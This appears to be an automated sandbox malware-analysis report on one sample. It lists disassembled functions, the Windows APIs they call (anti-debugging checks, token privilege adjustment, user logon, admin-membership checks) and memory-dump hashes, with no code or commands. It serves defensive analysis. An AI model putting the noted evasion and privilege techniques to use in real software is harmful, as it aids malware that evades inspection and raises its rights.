                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: 5923bf182d8dffd8d0674baf8e47d7dcb5de1085cb5d3b6f392dad4e26dd05f6
                                                                              • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                              • Opcode Fuzzy Hash: 5923bf182d8dffd8d0674baf8e47d7dcb5de1085cb5d3b6f392dad4e26dd05f6
                                                                              • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                              Function 02F51361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02F51459
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02F51463
                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02F51470
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: 89a86c2bbe518d311fcb17c981bdeee039990f4a55ed49ecbef6f4000b8461be
                                                                              • Instruction ID: 9f3993d2ba61de090edb578e5774d96842736a12400d8346c4bd613dc184a6ea
                                                                              • Opcode Fuzzy Hash: 89a86c2bbe518d311fcb17c981bdeee039990f4a55ed49ecbef6f4000b8461be
                                                                              • Instruction Fuzzy Hash: AD31E574D0122CABCB21DF64DD8878DBBB8BF08350F5042EAEA1CA7250E7309B958F54
                                                                              Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                              • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                              • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                              • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                              Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                              • GetLastError.KERNEL32 ref: 00458865
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: b7373a83a895d7e2e880dc15f24a8c97906aaff218fa00fb89185d783704a628
                                                                              • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                              • Opcode Fuzzy Hash: b7373a83a895d7e2e880dc15f24a8c97906aaff218fa00fb89185d783704a628
                                                                              • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                              Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                              • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                              • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                              • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                              • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                              Function 02F53F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000,?,02F52038,00000003), ref: 02F53F5E
                                                                              • TerminateProcess.KERNEL32(00000000,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000,?,02F52038,00000003), ref: 02F53F65
                                                                              • ExitProcess.KERNEL32 ref: 02F53F77
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 2399a43aecf83fb1815cdbab783fdd7d7be8e5b6e390a0eab656336467315c67
                                                                              • Instruction ID: 9274c56444b8015bf360e39b05a220abd1c26c5af4701af0bb02b7b2cae0155e
                                                                              • Opcode Fuzzy Hash: 2399a43aecf83fb1815cdbab783fdd7d7be8e5b6e390a0eab656336467315c67
                                                                              • Instruction Fuzzy Hash: 34E01231848A28ABCF016F29D808A597BAAEF487C1B004954FF058B121CB35D962CB80
                                                                              Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 0046889B
                                                                                • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: 0eL
                                                                              • API String ID: 2893107130-3167399643
                                                                              • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                              • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                              • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                              • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                              Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                              • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                              • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                              • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                              • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                              Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                              • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                              • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                              • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                              Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                              • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                              • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                              • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                              • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                              Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                              • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                              • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                              • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                              Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                              • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                              • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                              • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                              Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                              • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                              • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                              • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                              Function 02F539A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F5399E,?,?,00000008,?,?,02F51CF4,00000000), ref: 02F53BD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: 7a82eae4e046fdad2ae78c9c53434bad2f90ba01f3f0ffd8e109eb119e2724df
                                                                              • Instruction ID: c8fccb701927715f31a649f32efa17c51c732f2b8861ee9b6ff48ec15822361a
                                                                              • Opcode Fuzzy Hash: 7a82eae4e046fdad2ae78c9c53434bad2f90ba01f3f0ffd8e109eb119e2724df
                                                                              • Instruction Fuzzy Hash: 6DB14E366106189FD715CF2CC48AB557BE0FF453A8F258698EE9ACF2A1C335E991CB40
                                                                              Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                              • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                              • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                              • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                              Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                              • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                              • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
